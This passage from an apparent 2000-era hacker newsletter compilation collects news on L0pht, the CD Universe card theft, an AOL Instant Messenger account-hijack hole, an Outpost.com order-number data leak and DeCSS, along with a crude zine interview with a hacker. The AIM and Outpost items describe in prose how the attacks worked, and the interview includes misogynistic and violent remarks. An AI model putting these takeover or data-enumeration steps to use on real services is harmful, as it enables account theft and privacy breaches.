crashed on mars, but they'll probably never know for sure. Two panels investigating the failure are due to report in March. Coming up later in the show: dolphins stranded in the shallows, and the rescue effort that helped turn things around. But first, some underground computer hackers surface to show what's at stake when you're online. (COMMERCIAL BREAK) LOCKRIDGE: A mysterious hacker group that's legendary in some Internet circles is going mainstream. The Boston-based group, called Lopht, is starting a company to advise big business on computer security. Our reporter Ann Kellan has known members of Lopht for two years now, and wonders how if the new corporate ties will change their lofty goals. (BEGIN VIDEOTAPE) "MUDGE", LOPHT MEMBER: We decided Lopht is now going to completely sellout, and we are going to join the mainstream. ANN KELLAN, CNN CORRESPONDENT: He gives keynote speeches to packed houses... "MUDGE": If you're looking for computer security, then the Internet is not the place to be. KELLAN: ... is invited, along with fellow group members, to testify before the U.S. Senate. He's a trained musician, and plays a mean guitar. He goes by the handle "Mudge," won't reveal his name, rank or Social Security number... "MUDGE": I don't worry have to worry about, you know, who's waiting outside of my house when I leave in the morning. KELLAN: ... and has been a member of a band of computer hackers called Lopht since 1992. UNIDENTIFIED MALE: Seven people, close quarters, on top of each other -- it's amazing that we get can actually get along without being at each others' throats. KELLAN: Headquarted in a secret warehouse near Boston, the Lopht is filled with hand-me-down equipment. Even the bathroom is wired. "WELD POND," LOPHT MEMBER: Here's our bathroom. Normally, a bathroom wouldn't be very exciting, but our bathroom has a Web browser. KELLAN: There are processors and networks, from Novell to Microsoft. UNIDENTIFIED MALE: We got it from dumpsters. We got it as, you know, people give equipment to us. KELLAN: And once they own it, they legally attack it, learning how each system works, inside and out. "WELD POND": We don't just attack Microsoft, no matter what, you know, Microsoft might say. KELLAN: Each member has area of expertise. "Weld Pond," programmer and Web guru. "Brian Oblivion" knows networks. "Silicosis (ph)" deciphers network codes. "Space Rogue" knows the inner workings of Macintosh computers. He also publishes a daily hacker newsletter on the Web. "SPACE ROGUE," LOPHT MEMBER: There a lot of things that go on that affect the hacker culture and the people that are in the hacker community that don't really get reported in the mainstream. KELLAN: "Kingpin" is a hardware expert, started hacking when he was 7, not always legally. He says Lopht helped set him straight. "KINGPIN," LOPHT MEMBER: I got into trouble for some things when I was younger, and they basically took me under their wing. They must have thought I had some good in me. UNIDENTIFIED MALE: Still do; we're just still trying to find it. KELLAN: "Dill Dog" is an ace programmer. Before joining Lopht, he made headlines in another hacker group, developing software that let's people access computers from remote locations, for good or for bad. It ticked off the likes of Microsoft, but if a system is vulnerable, Lopht's philosophy is to go public with it. "MUDGE": If you don't bring it public and if you just hand information off to the offending company, they just want to bury it, because it's cheaper for them to do that. KELLAN: Considered by many the consumer advocates of the computer world. "KINGPIN": We know the computer industry is here to stay, and we want to make security better. We want to make the industry better. KELLAN: In the hacker world, blue hairs mingle with crew cuts and criminals with feds, the cops and robbers attend the same conventions, to learn from each other -- where computer vulnerabilities are, where thieves can break in and steel everything, from bank accounts to medical records. KELLAN (on camera): How vulnerable are all the systems out there? (LAUGHTER) UNIDENTIFIED MALE: Toys can be hacked. KELLAN (voice-over): The Lopht has been an exclusive hacker playground. And now this band of hackers is going corporate, moving to white-walled offices money, getting money to buy new equipment, a place where they can do more good, says "Mudge." As far as their old stomping grounds... "MUDGE": The luxurious labs will still exist there for sometime, I'm sure, but... UNIDENTIFIED MALE: We still can't tell you where you it is. "MUDGE": Even the Lopht folks are sitting there going, we love this place, but boy, we can make something so much better. KELLAN: The move is good, and he'll stay casual and keep his personal life private, he says. But will success change Lopht's goals? UNIDENTIFIED MALE: One thing we always said about Lopht, if it stops being fun, then it's not Lopht, then it's work. "KINGPIN": It's just so wonderful to figure out how the world works around you, and especially when it doesn't. UNIDENTIFIED MALE: It is a family, that's what it is. KELLAN: For SCIENCE & TECHNOLOGY WEEK, this is Ann Kellan. (END VIDEOTAPE) LOCKRIDGE: The Lopht members say their security expertise is particularly needed in the field of e-commerce. They see a conflict there between protecting data and the need to make Web sites very easy and welcoming for cyber-shoppers. But, says one of their new corporate partners, "If you can't do security right, you can't do e- commerce right." "Mudge" agrees, and says security should no longer be just walls built to keep people out, but an element that makes everyone's job easier, from the warehouse to the delivery company to the customer. Coming up: from climate patterns to better weather detection, we'll tell with you what's making waves. (COMMERCIAL BREAK) LOCKRIDGE: Some climate researchers think there's a big change going on in the Pacific Ocean that could bring weird weather for the next 30 years. They say unusual areas of warm and cold water may mean we're entering a pattern called the Pacific Decadal Oscillation, which changes weather around the world. Anne McDermott has more. (BEGIN VIDEOTAPE) ANNE MCDERMOTT, CNN CORRESPONDENT (voice-over): Painting the lawn: Another wacky California custom? Well, no. This was back in the late '80s, when a drought burned up all the grass. Eventually, though, the vegetable dye was washed away by El Nino. But it may be time to get out that green dye again, because according to the experts, more drought is on the way. And that's because of a natural recurring climate pattern over the Pacific Ocean called Pacific Decadal Oscillation, or PDO for short. Unlike El Nino, which only sticks around a year or two, PDO is a much bigger phenomenon, and one that waxes and wanes over the course of 20 to 30 years. Scientists monitoring this PDO say it steers the jet stream over North America and will result, they say, in lots more rain in the Northwest part of the United States and less than normal rainfall in the Southern part of the country. WILLIAM PATZERT, JPL OCEANOGRAPHER: When the Pacific speaks with events like this, Pacific Decadal Oscillation, the United States definitely listens. MCDERMOTT: How severe droughts will be is by no means possible to determine, but expect a renewed interest in those low-flow showerheads and those water-skimping toilets. No one's forgotten rationing or the sacrifices. UNIDENTIFIED MALE: Not being able to wash down my driveway and wash my car. MCDERMOTT: Now this PDO is not related to global warming, but its reach may be global. Scientists say it's possible that the PDO played a part in the terrible flooding in Venezuela last year and in those wind storms that battered Europe late last month. But mostly, this climate pattern will affect the U.S. In fact, it's already happening. Scientists say New England's long wait for that first big snow is related to the PDO. Next up: well, at least some periods of drought in some parts of the country, though it's unlikely it'll make anyone yearn for the return of El Nino. For SCIENCE & TECHNOLOGY WEEK, I'm Anne McDermott, CNN, Los Angeles. (END VIDEOTAPE) LOCKRIDGE: If we're going to have strange weather in the next few years, at least forecasters may be able to give us a bit more warning of what's coming. The National Weather Service has a brand new computer, and officials say it will make predictions faster and more accurate. Natalie Pawelski reports. (BEGIN VIDEOTAPE) NATALIE PAWELSKI, CNN CORRESPONDENT (voice-over): Predicting this week's snowstorms and bitter cold and forecasting the hurricanes and tornadoes of warmer months has just gotten easier, says the National Weather Service, thanks to a new supercomputer. JACK KELLY, NATIONAL WEATHER SERVICE: We're starting off today with a much -- a five-times-faster computer than we've had, and by September, it will be about 28-times faster than the one we currently have. So. we're able to do better simulations of the atmosphere. PAWELSKI: The Weather Service says the new computer will give people more lead time to prepare for severe storms, and it's designed to run increasingly-complex forecasting models that predict what's coming with ever-greater detail. KELLY: What's that mean for everyone? It means more accurate forecasts, longer-time forecasts and more accurate, both temperature, rain, you name it; it's going to be better than what we've been able to do. PAWELSKI: They say everybody talks about the weather but nobody does anything about it. The new computer should allow people to talk about coming weather further in advance. And while we still can't do anything about it, at least we can be better prepared. For SCIENCE & TECHNOLOGY WEEK, I'm Natalie Pawelski. (END VIDEOTAPE) LOCKRIDGE: Coming up next: surfing the Web and the water. We'll travel to Florida for a marine mammal mystery, then introduce you to an older generation learning some new technology. (COMMERCIAL BREAK) LOCKRIDGE: Skywatchers with clear weather got a spectacular show on Thursday night. A total lunar eclipse made the full moon glow an eerie shade of red over North and South America. This was the first time in four years that the Sun, Earth and Moon lined up just right to produce this kind of show. It happens when the Earth's shadow blocks most of the Sun's rays from lighting up the Moon. The next full lunar eclipse will be in July, and the best viewing for that one will be from Asia and Australia. Marine biologists in the Florida keys are trying to solve a mystery. Starting last weekend, dozens of bottle-nosed dolphins began stranding themselves on tidal flats. They included both healthy and sick animals, and scientists are trying to figure out just what drove them so close to shore. Reporter Mike Tobin, from our affiliate WSVN, has the story. (BEGIN VIDEOTAPE) MIKE TOBIN, WSVN REPORTER: Hours and hours of desperate, exhaustive labor got rescuers to the point where they finally chased the dolphin out into open water. CHRIS BLANKENSHIP, MARINE BIOLOGIST: It's nice to see him go offshore, but whether they get stranded again, we don't know. TOBIN: Without warning, dolphins started coming ashore, not just on Long Key, but on the west coast of Florida. These dolphins ran aground at Aresnicker (ph) Bank, about five miles off Long Key. So necropsies are being performed on all the dolphin that died to see if there was an illness or toxin which caused this. BRAD LANGE, LAYTON, FLORIDA FIRE DEPARTMENT: Something's obviously going on. Right now, we're checking dolphins out, and hopefully we'll know more later on. TOBIN: There were two efforts going on in the water, one to nurse the ill, exhausted or injured back into swimming shape, and two, to scare the healthy dolphin into the open sea, but the first attempts at human chains were unsuccessful. The healthy dolphin kept coming back. Then someone came up with a theory that this was tightly knit pod of dolphin, and the sick ones were calling for help. BLANKENSHIP: Sometimes animals will, when they congregate together as a family, if you get a couple of sick ones, and they have this feeling of responsibility, at least in my mind, you know, they have to take care of the animals that are sick. TOBIN: So they moved the sick ones to a tank onshore, where they couldn't communicate with the other dolphin. Sadly, one of those died when it was moved. DENISE JACKSON, WILDLIFE RESCUE: We have had scenarios that once the injured and the sick ones died, the healthy ones did leave. TOBIN: Then the volunteers formed a human chain again, this time with kayakers in front. With buckets of fish on their legs, they would try to act like the Pied Piper, tempting the dolphin out to sea. With all the people behind them scaring the dolphin, the survivors made it to the open water, where they can't be injured or trapped by the sharp corral the in the shallow water of the Keys. LANGE: We consider this a great success because there could have been a lot of them expired. (END VIDEOTAPE) LOCKRIDGE: That report from Mike Tobin, of our affiliate WSVN. When you imagine a typical Internet user, you might think of a teenager endlessly chatting with friends, or a young business tycoon checking stock prices on a Palm Pilot. But the Internet's not just for the young. As Don Knapp reports, it's keeping some senior citizens young at heart. (BEGIN VIDEOTAPE) DAVID LANSDALE, GERIATRICS EXPERT: So let's go down one more, push your enter key. DON KNAPP, CNN CORRESPONDENT (voice-over): David Lansdale's found a way to spark up the lives of the elderly. He gets them wired to the Internet. LANSDALE: Now one more. Now type "au." UNIDENTIFIED FEMALE: I thought maybe I was through with life, I was ready for a rocking chair because I was 86 years old, and I haven't found the rocking chair yet. KNAPP: The average age of Lansdale's students is around 68. All are in nursing or assisted care homes. He used family relationships to introduce them to the Web. LANSDALE: Here they are in California, a family was back in New York. The opportunity for them to connect, to cross that time and space, was an incredibly-precious opportunity to them. UNIDENTIFIED FEMALE: I hear you are so beautiful. KNAPP: Lillian Sher (ph) dictates an e-mail to a newborn great granddaughter. Working with one another, the seniors learn as a group, to both master the Internet and overcome what Lansdale calls the maladies of the institutionalized: loneliness, helplessness, boredom and cognitive decline. MARY HARVEY, WEB SURFER: Bingo just doesn't appeal to me, but this does. Believe me, this does. (LAUGHTER) KNAPP: Ninety-four year-old Ruth Hyman is a star pupil and an instructor. RUTH HYMAN, INTERNET INSTRUCTOR: When I sent a letter to my grandchildren, a great grandchildren, they hanged it up in their offices, just like I used to hang their drawings on my refrigerator. LANSDALE: There's a collective benefit, there is an element of -- a tremendous element of therapy. And remember that we started as a support group. DIXON MOOREHOUSE, WEB SURFER: I just wished I was 15 years old and getting to learn all this. LANSDALE: The seniors call their weekly meetings Monday Night Live, and many say it's given them new life. HYMAN: Three years ago they told me I wasn't going to live, but I showed them. I got on the Web and got work, and I worked ever since. KNAPP: For SCIENCE & TECHNOLOGY WEEK, I'm Don Knapp. (END VIDEOTAPE) LOCKRIDGE: Thanks for joining us. I'm Rick Lockridge, in for Ann Kellan. Next week: technology evolution and how it affects you. The digital age has produced lots of new businesses and is threatening to kill off some old ones. It's survival of the fittest, where the losers become techno-saurs. That's coming up on the next SCIENCE AND TECHNOLOGY WEEK. We'll see you then. TO ORDER A VIDEO OF THIS TRANSCRIPT, PLEASE CALL 800-CNN-NEWS OR USE OUR SECURE ONLINE ORDER FORM LOCATED AT www.fdch.com -=- ABC News; By Bill Redeker Jan. 22 — Computer crime is on the rise. And as more people start purchasing online, entrusting their credit card numbers and other personal details to the ether, many experts say it is time to step up the battle for online security. “You don’t even have to be a really knowledgeable intruder, you can just use one of these tools that are out there and break into a system,” says Kathy Fithin of the Computer Emergency Response Team at Carnegie Mellon University in Pittsburgh. Last year the Response Team received reports of more than 8,000 Internet attacks and intrusions. Connecticut-based CD Universe reported it received a fax from a hacker describing himself as a 19-year-old from Russia. The hacker offered to destroy the credit card files he had accessed through a flaw in the software for $100,000. When CD Universe passed up the offer, the hacker retaliated by posting up to 25,000 numbers on a Web site called Maxus Credit Card Pipeline. Card Numbers Cause Alarm “What’s interesting about this case is the sheer scale of the crime. The person claims to have 300,000 credit cards, which is an enormous amount,” says security expert Elias Levy. Discover Financial Services, Visa, MasterCard and American Express are all working to get new cards to the customers compromised by the Russian hacker. The Maxus incident is bound to reignite consumer concern over online security. At least 30 businesses are compromised every day, according to ABCNEWS research. The problem has led to a boom in computer security firms. @Stake, a security firm in Boston, went to the source and hired eight of the most prominent hackers in the country, a group called L0pht Heavy Industries. The L0pht crew consider themselves “gray-hat” hackers. Unlike black-hat hackers such as Maxus and white-hat vigilante hackers who sabotage kiddie-porn sites, L0pht identifies security flaws publicly then dares companies to fix them. Several L0pht members have testified in Congress about online security. They’ll be helping @Stake design systems that even they can’t penetrate. “I think we really understand how people break into computer systems because we do it ourselves,” said Weld Pond, a L0pht member. Hackers vs. hackers: it may be the face of the future. @HWA 48.0 HNN: Jan 24: Several New Ezine Issues Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I really hoped to review at least one of these for this issue but the sites are so damn slow or over crowded I couldn't reach them so hopefully next issue i'll have some snippets/a review for you - Ed From HNN http://www.hackernews.com/ contributed by Armour, The Hex, and others New editions of several underground e-zines have been released. InET from Columbia in both English and Spanish, Issue #1 of Hack in the Box, Quadcon #3 from Australia and DataZine 0.01 from the folks at Datacore have hit the streets. Get your copies now! InET http://www.warpedreality.com/inet Hack In the Box http://www.thelimit.net/hitb Quadcon http://landfill.bit-net.com/~quadcon/quadcon-3.txt DataZine http://www.tdcore.com If anyone else manages to get through and wants to write a review on these (or any other zine, even if its your own *G*) go ahead and email it in and i'll post it in the zine. - Ed Here's a taste of Quadcon by Amour from Australia (Issue #1) **************************************************************************** ***************************<-=- QuadCon -=->******************************** **************************************************************************** *************The Newsest Zine To Hit Australia And The World**************** */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/ */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/ ============================================================================ December 1999 - Issue 1 ============================================================================ Whats In This Issue: # Halcon Hacker Valiant Gives QuadCon An Exclusive Interview And Some Special Tips In Trying To Prevent Your Machine From Being Hacked =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The Interview Of Valiant The Leader Of Halcon. | http://www.halcon.com.au ---------------------------------------------- BackGround: Halcon was founded in 1993 as a Bulletin Board System and by 1996 had grown to atleast ten members. Still growing, in October 1996 the group took on the name Halcon Technologies and in 1997 Valiant registered a business name, allowing them to register the halcon.com.au domain name. Although the group was not widely known, on 22nd October 1999, Halcon was blamed for a massive hack on the Australian Republican Movement website. Despite denials and misquotations, the story was covered by news outlets, an example of which is at the following URL: http://www.halcon.com.au/arm0001.html Following this incident, Halcon received massive amounts of publicity (most of it was unwanted) and Valiant claims that Halcon has become the most popular hacking group in Australia. It currently has 24 members and thousands of supporters. Having been misquoted once, Valiant has since denied all interviews to the press, including an offer from Channel Nine. QuadCon is therefore proud to present an exclusive, uncut interview with Valiant. ------------------------------------------------------------------------------- The Interview ------------- QuadCon: If you were a system administrator of a newly installed slackware linux machine and you had 20 minutes to secure it what would you do? Valiant: Go to all the available sites (www.halcon.com.au/links.html) that cater for that, and quickly grab and install as many patches for your software available. Close all services (especially fingerd) that arn't needed, relocate telnet to a different port (I know it breaches RFC's, but fuck it.) and make sure that you don't adduser lamers. :) QuadCon: What is the most common thing to hack to gain access to? Valiant: Fingerd is the most exploitable feature on machines, the good old crackers highway. Allthough these days it's neglected as a mode of system penetration, also alot of sysadmins don't understand the point of finger anymore and remove it anyway. As for hacking, the best method available that I remember overusing would be a buffer overflow in a certain software which makes calls to root. Flood the software, bang, down it goes and you have root. :) QuadCon: Does the name Halcon have any relavence to you and why did you choose it for the name of the group? Valiant: Halcon .. well, I chose that many years ago, so I can't really remember why it was chosen, other than that it sounds funky. :P QuadCon: How would you characterize the media coverage of you? Valiant: Trivial and biased. They just want an 'evil hacker genious' who brags about how he hacked NASA, they don't really like me as basically I won't brag, and I prefer to explain how idiotic the consumers are for purchasing fucked computers, etc, and other consumer related problems. QuadCon: What do you think about hacks done in your name--for instance, the Australian Republican Movement hack? Valiant: I wasn't expecting such media coverage on that topic, however they have no evidence against me, and I have yet to admit to even being born at this point in time. So fuck 'em all. :) QuadCon: What's the biggest misconception perpetuated by Hollywood cybermovies? Valiant: There is no such thing as a hot female hacker named Acid Burn who has pert tits and lips that would look very nice wrapped around my hard disk. :) QuadCon: In your own words, define hacker. Valiant: There's two meanings. I fall into both. The code hacker, who lives to program and does it the hard way, and the system hacker, who loves finding exploitable features in systems to gain access, does so, notifies the sysadmin and patches the hole. QuadCon: What is your technical background. (Which platform do you prefer PC/MAC? What is your online background? Do you do networking? Do you know programming languages,etc.) Valiant: At the moment my prefered operating system is Windows 98 due it's usability and comprehensive system architecture, when it comes to personal use, for industrial things such as networking, I prefer any linux distribution. I am a PC user, allthough I have a few old Apple Classics in my computer collection. I've been using the internet through BBS gateways for ten or more years. I network when I have to, but I used to work as a network engineer. As for programming languages, I have a bad memory and generally have to 'relearn' things when I need them, however it's more a refresh than a relearn. :) QuadCon: I understand that hackers assume an online nickname to become known by - how did you acquire your nickname? Valiant: I was seven years old when I logged onto a BBS using an audio coupler 900 bps modem at a friends place. It asked for a handle, Valiant was my current dungeons and dragons charracter, so I typed it in sheepishly. I've been known by it ever since. :) QuadCon: What do you portray system administrators are like? Valiant: Fail-safe devices that take care of systems, that if programmed correctly would never need human assistance. :) QuadCon: What do you think of ALOC, another aussie hacking group? Valiant: Who? :) QuadCon: What currently is Halcon working on? Valiant: Currently working on? We're currently working on the ultimate encyclopeadia of how to be slothenly and lazy. :) QuadCon: What would you like Halcon to be in the future? Valiant: I don't know, that's a hard question really. I never wanted it to be anything to begin with, time has just made it bigger than I ever expected. Back when I was a kid and it first started, I never really thought it would exceed a BBS group of users who were of the same interests. Now it's allmost like a religious cult for some. :) QuadCon: Who in the world do you dislike most? Valiant: Anyone with an IQ under 110. :) 100 is average, so I like people a tad over. The others should be neutered and shot. :) QuadCon: Any last comments? Valiant: I like being a cunt-rag. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Special Thanks -------------- Valiant of Halcon http://www.halcon.com.au =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Support Us ---------- Please support us - we are looking for a fast permanent unix box to host a website with all our zines on. If you believe you can help see the contact section below. Also if you know anyone who wants or deserves to be interviewed also see the contact section below. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Contact ------- I can be contacted on IRC irc.wiretapped.net or on the email address marena@iinet.net.au =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Copyright 1999 QuadCon [This "how not to write a zine"-style document got this response from the people hosting the file (wiretapped.net):] http://the.wiretapped.net/security/textfiles/quadcon/response.txt @HWA 49.0 HNN: Jan 25: AIM Accounts Susceptible to Theft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AOL will always have problems of some sort, no matter what they do, the system is just too big and complex and the operators do not know more than the basics of how the user interfaces work expect to see many more AOL/AIM etc problems and exploits - Ed Oxymoron: "AOL tech support" From HNN http://www.hackernews.com/ contributed by no0ne A group of teenagers have discovered a way to take over any AOL Instant Messenger account as long as they know the person's screen name. A staff tool that was picked up from AOL's proprietary online service lets them exploit a hole in AOL 5.0's registration process, allowing them to reset users' passwords. During the AOL 5.0 registration process, AOL asks for a person's screen name. The teenagers enter the screen name they want to have, when prompted for a password they make one up to get the "invalid password" message. AOL 5.0 then buffers the screen name within the registration process. The perpetrators then jump to another part of the registration process where AOL thinks the intruder is the rightful owner of the AIM screen name and permits the password to be reset. AOL says it is working to correct the problem. C|Net http://news.cnet.com/news/0-1005-200-1530654.html?dtn.head ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdhpnews01 MSNBC http://www.msnbc.com/news/361415.asp Wired http://www.wired.com/news/business/0,1367,33881,00.html CNET; Hackers learn how to take over AOL IM accounts By Courtney Macavinta Staff Writer, CNET News.com January 24, 2000, 4:30 p.m. PT America Online Instant Messenger users could find their online identities stolen via a security hole that allows hackers to hijack their accounts through another popular service: AOL 5.0. A small band of hackers has discovered a way to take over any AOL Instant Messenger (AIM) account as long as they have a person's screen name. By using an AOL staff tool they unearthed while poking around the company's proprietary online service, they exploit a public hole in the AOL 5.0 registration process that lets them reset AIM users' passwords. Once the hackers do this handiwork, initial users of the screen names are locked out of their accounts, giving the hackers open access to users' "buddy lists" of other AIM users and the ability to maintain trial AOL 5.0 accounts under the same screen names, as confirmed by CNET News.com. AOL spokesman Rich D'Amoto said he hasn't heard of any complaints about stolen AIM screen names, but that the company is looking into the issue and will try to track down the hackers. "We're aware of the situation and we are deploying security measures to defeat the hackers," D'Amoto said. More than 40 million people have registered AIM screen names and use the program to carry on short conversations or send quick alerts to their friends or co-workers. AIM users can set up private buddy lists and never have to share their screen names with people they don't know. But many users give up their names freely in chat rooms or through AIM's "find a buddy" feature, which lets users search for someone to talk with based on a common interest, such as books or religion. The teen-age hackers who found the hole in AOL 5.0 say they have stolen more than a hundred names, such as "New York City." Some use the names they've seized to extract information about the person from friends and family. Mostly the ploy is a game. "We do it if we've seen someone we don't like in a private chat room," one of the hackers said in an interview. At one point, the high school senior said he tried to let AOL know about the hole. "If AOL would just listen to people like us instead of blowing us off and terminating our accounts, they could fix it," he said. Security holes usually aren't kid's stuff to a major company such as AOL, however. In the wake of high-profile privacy breaches by way of human error and email-based attacks, AOL has been forced to take security seriously to ensure its more than 20 million members that their personal information, e-commerce transactions and communications are protected on its service. AOL wants AIM registrants to feel safe, too; their frequent and consistent activity adds up to lucrative advertising dollars for AOL. And AOL's quality control and privacy measures will only become more important--and potentially harder to manage--as its acquisition of Time Warner takes shape. AOL will likely try to close the loophole in the registration process that allows the hackers to assign a new password to the account. Here's how it works: At one point in the 5.0 registration process, AOL asks for a person's screen name. The hackers enter the screen name they intend to steal, but when asked for a password, they simply guess and get an "invalid password" message. The trick is that AOL has "buffered," or remembered, the screen name within the registration process. The hackers then use a tool that lets them jump to another part of the registration process. Once these steps have been taken, AOL thinks the hacker is the rightful owner of the AIM screen name and later on in the registration process permits the password to be reset. Security experts say such abuses aren't rare. "These software faults are more common than most people think; it's more common than we would like," said Elias Levy, of the consulting firm Security Focus. "Most companies, their first reaction is to deny the problem and then go into damage recovery mode and fix the problem without acknowledging it." Although AIM users could simply register a new screen name, Levy said that having a name stolen could be more of a concern for people who use messenger or chat programs for professional reasons. "It can be nerve wracking if someone stole your online personality," he said. AOL said that if a person has had their AIM screen name stolen, for now they can use the program's "forgot password" feature to have an email sent to the address they provided at registration that includes the account's current password. Then the original holder of the screen name can reset the password once again. -=- -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Hackers impersonate AOL users By Lisa Napoli, MSNBC January 24, 2000 6:09 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdnntop Since November, a group of teenagers say they have been stealing AOL Instant Messenger screen names and masquerading as their rightful owners. The hackers sometimes act as imposters and pilfer credit card numbers and other personal data from friends and family of the exploited online users. The hackers demonstrated their method to MSNBC on Monday. According to a letter the hackers sent on Sunday to members of the technology press, they use the names "just for the pure joy of trying to ruin friendships by insulting friends who have no idea they are talking to a hacker and not the victim." The hackers say they have contacted the media because AOL (NYSE: AOL) had not responded to their notification to them of the security hole. An AOL spokesman, Rich D'Amato, said on Monday afternoon, "We are aware of the situation and are deploying security measures to defeat it. When hacker behavior crosses the line into illegal action, we'll certainly bring it to the attention of authorities." D'Amato would not specify how many people had been affected or pinpoint the time line, saying those details could affect the investigation. "AOL is so easy to abuse, it's pathetic," said TangentX, who says he is 17- years-old and, along with two others, found the security hole this fall. They discussed it, he said, in special private chat rooms on AOL for hackers and use of the so-called "exploit" spread. He estimates that 400 names have been stolen to date. AOL press materials say that 45 million people have created AOL Instant Messenger screen names as of last August. The popular software allows online users to chat privately, almost in real time, with others who have the software. AOL also owns ICQ, another popular instant messaging program, which claims 50 million registered users. TangentX says he and others have found several ways to make an instant message screen name into an AOL account without the password. One involves resetting a password for a screen name through a security hole. The other involves taking a screen name, creating an AOL account for it and then changing the password. When he was given a screen name on Monday afternoon by MSNBC, TangentX was able to access the account and send an instant message from the name in a matter of minutes. -=- MSNBC; Fuck em, check the link yourself. :-/ (No I don't like Micro$loth) -=- Wired; Hack Takes Aim at AOL Clients Wired News Report 5:30 p.m. 24.Jan.2000 PST A security breach on AOL Instant Messenger put the privacy of AIM users at risk on Monday, according to a published report. The breach, first reported in Salon, allows subscribers to link new AOL accounts to AIM names that already exist. Holes in the sign-up process allow people to get around the password protection of the AIM accounts. "We are aware of it and are deploying security measures to defeat it," said Rich D'Amato, a spokesman for AOL. AOL's online service is used to changed passwords, so hackers are easily able to open new accounts using the existing AIM user's name. People who subscribe to AOL are not affected by the breach. People who use instant messaging software (AIM) outside of AOL, are. D'Amato called the security breach an example of "hacker behavior that crosses the line into illegal action." "Our intention is to investigate this and when we identify an individual or groups of individuals, we intend to bring this to the attention of the proper law enforcement authorities," D'Amato said. He declined to speculate on when the problem will be fixed or how many users were affected, although he characterized it as "a very small number." David Cassel, who edits the AOL Watch mailing list, claimed the security hole was easily preventable. It was simply a matter of someone thinking through the sign-on process. "AOL left a gaping hole in the way they implemented it," Cassel wrote in an email. "Those who happened to have an AOL account weren't vulnerable, but everyone else was. To promote such an easily cracked software really violates any reasonable expectation of security. In that sense, all AIM users were affected." "AOL is a marketing company, not a technology company," Cassel wrote. "They mass-promoted a software that's vulnerable to easy attacks." @HWA 50.0 HNN: Jan 25: Outpost Leaks Customer Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench By changing the order number in the URL users at Outpost.com are able to view the personal information, including the type of credit card used, of other users. An Outpost spokesperson said that the problem would be fixed immediately. (This type of problem is extremely old, it is surprising that such a large company such as Outpost has this problem. This just further illuminates the need for effective e-commerce security.) Wired http://www.wired.com/news/technology/0,1282,33842,00.html Outpost Leaves Data Unguarded by Chris Oakes 1:25 p.m. 24.Jan.2000 PST While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too. He noticed that the long Web page address for his transaction included his order number, and decided to see what happened if he changed a digit to try and access other customers' records. The modified address pulled up the same detailed transaction summary for another customer's order number -- including a full range of sensitive, and valuable, personal data. "You can see someone's email address, their billing address, their shipping address, type of credit card they used, their order history -- everything they bought, everything they received, everything they're currently waiting for," Wynne said. In addition to exposing nuggets of information about individuals -- tying their email identity to their street address, and revealing recent purchases -– the security glitch could be exploited by marketers to build databases of target customers, said Wynne. "I could set up data-mining program that would check random [order] numbers and find out all people who bought PalmPilots at Outpost.com," he said. Outpost.com acknowledged the flaw Monday and said it would have the problem fixed by the end of the day. But the vulnerability did not represent a dramatic risk, the company said. Most commerce sites prevent the simple searching of their database by encrypting or otherwise preventing the data from appearing in URLs. "It shouldn't be there, but it is," said Outpost.com spokesman Craig Andrews. "It's sort of hidden buried away in the URL," he said, claiming that only hackers looking for holes would be able to find it. Furthermore, he said, while the hole revealed both personal and purchasing information, it did not betray credit card numbers or other vital financial information. "It's unfortunate that pricing and product information is there. But the other personal information is all over the place. You can go to a place like [Web information directory] 411 and get addresses and personal email." However, Andrews acknowledged that people generally volunteer the information in directory services, and purchasing information is not included. Ray Everett-Church, chief privacy officer at Alladvantage.com and longtime spam-watcher, said the flaw is more of a threat than Outpost portrayed it to be. "I would certainly consider this a threat to not only integrity of data privacy promises a site might make, but certainly to the kinds of confidence level that companies should be trying to instill in consumers," Everett-Church said. "It causes folks to question the security of these transactions and the advisability of entering into them in the first place." Was it an oversight that led to the hole? Technically, yes, but not really, said Outpost.com's Andrews. "Between management of the site and the software they use to manage orders, it was just something that hadn't come up.... It wasn't really an oversight by the textbook definition." Everett-Church said he doesn't think the public hears about personal data vulnerabilities nearly as often as they occur. "I think these sorts of Web ordering systems have these problems quite frequently -- probably more frequently than we realize. All it takes is a clever hacker to keep poking and prodding at the systems to find these kinds of weaknesses." @HWA 51.0 HNN: Jan 25: DeCSS Author Raided ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Zorro The National Authority for Investigation and Prosecution of Economic and Environmental Crime in Norway has raided the home of Jon Johansen of Steinsholt Norway. Jon is the author of the controversial software DeCSS. Authorities confiscated his computer and cellphone, they also questioned him for up to seven hours. Both Jon and his father have been charged with breaking the copyright act and the penal law which could result in up to 3 years in prison. Slashdot http://slashdot.org/articles/00/01/24/2024233.shtml VG - Norwegian http://www.vg.no/pub/vgart.hbs?artid=5712180 TV 2 - Norwegian http://www2.tv2.no/nyss/n2i.vis?par=70&par=1623664&ext=378097 @HWA 52.0 HNN: Jan 25: Solaris May Go 